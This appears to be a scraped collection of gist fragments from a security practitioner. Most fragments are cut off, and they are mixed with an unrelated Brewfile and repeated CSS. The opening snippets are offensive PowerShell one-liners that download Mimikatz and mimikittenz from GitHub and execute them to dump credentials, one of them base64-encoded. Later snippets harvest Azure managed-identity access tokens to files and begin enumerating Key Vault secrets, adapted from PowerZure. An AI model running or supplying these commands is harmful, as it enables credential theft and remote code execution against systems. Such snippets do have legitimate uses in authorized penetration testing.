dansecops

*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!*

#mimikatz
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); $m = Invoke-Mimikatz -DumpCreds; $m

#encoded-mimikatz
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUABvAHcAZQByAFMAaABlAGwAbABNAGEAZgBpAGEALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGEAcwB0AGUAcgAvAEUAeABmAGkAbAB0AHIAYQB0AGkAbwBuAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAnACkAOwAgACQAbQAgAD0AIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0ARAB1AG0AcABDAHIAZQBkAHMAOwAgACQAbQAKAA==

#mimikittenz
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/putterpanda/mimikittenz/master

dansecops

tap "homebrew/bundle"
tap "homebrew/cask"
tap "homebrew/cask-fonts"
tap "homebrew/core"
tap "homebrew/services"
tap "jlhonora/lsusb"
brew "ack"
brew "gdbm"
brew "openssl"
brew "sqlite"

dansecops

body { background: #222; color: #e6e6e6; }

a { color: #949494; }

a:link, a:visited { color: #949494; }

a:hover, a:active, a:focus { color: #c7c7c7; }

hr { border-bottom: 1px solid #424242; border-top: 1px solid #222; }

dansecops

body { background: #222; color: #e6e6e6; }

a { color: #949494; }

a:link, a:visited { color: #949494; }

a:hover, a:active, a:focus { color: #c7c7c7; }

hr { border-bottom: 1px solid #424242; border-top: 1px solid #222; }

dansecops

body { background: #222; color: #e6e6e6; }

a { color: #949494; }

a:link, a:visited { color: #949494; }

a:hover, a:active, a:focus { color: #c7c7c7; }

hr { border-bottom: 1px solid #424242; border-top: 1px solid #222; }

dansecops

$azureApplicationId ="<app registration ID>"
$azureTenantId= "<tenant ID>"
$secret = "<secret>"
$azureSecret = ConvertTo-SecureString "$secret" -AsPlainText -Force
$psCred = New-Object System.Management.Automation.PSCredential($azureApplicationId , $azureSecret)
Clear-AzContext -Force
Connect-AzAccount -Credential $psCred -TenantId $azureTenantId  -ServicePrincipal 

dansecops

#Somewhat stolen from PowerZure Get-AzureKeyVaultContent and Show-AzureKeyVaultContent , thanks hausec!
#reimplemented by Flangvik to run in a single "Azure PowerShell" Agent job, inside an DevOps Pipeline 

#Suppress warnings for clean output
Set-Item Env:\SuppressAzurePowerShellBreakingChangeWarnings "true"

#Get all Azure KeyVaults from currently selected/scoped subscription
#This connection is known as an "Service connection",and in terms of accessing Azure resources, uses either Service principal or Managed identity
$vaults = Get-AzKeyVault

dansecops

$resourceURI = "https://management.azure.com"
$tokenAuthURI = $env:IDENTITY_ENDPOINT + "?resource=$resourceURI&api-version=2019-08-01"
$tokenResponse = Invoke-RestMethod -Method Get -Headers @{"X-IDENTITY-HEADER"="$env:IDENTITY_HEADER"} -Uri $tokenAuthURI 
$tokenResponseJson = $tokenResponse | ConvertTo-Json 
$tokenResponseJson | Out-File response.json
$accessToken = $tokenResponse.access_token | Out-File accesstoken.json

dansecops

# Code for monkeys
#                 __------__
#               /~          ~\
#              |    //^\\//^\|
#            /~~\  ||  o| |o|:~\
#           | |6   ||___|_|_||:|
#            \__.  /      o  \/'
#             |   (       O   )
#    /~~~~\    `\  \         /
#   | |~~\ |     )  ~------~`\

dansecops

function Get-AccessToken ($resourceURI) {
    $tokenAuthURI = $env:IDENTITY_ENDPOINT + "?resource=$resourceURI&api-version=2019-08-01"
    $response = Invoke-RestMethod -Method Get -Headers @{"X-IDENTITY-HEADER"="$env:IDENTITY_HEADER"} -Uri $tokenAuthURI 
    $armToken = $response.access_token
    return $armToken
}

$managementURI = "https://management.azure.com"
$keyVaultURI = "https://vault.azure.net"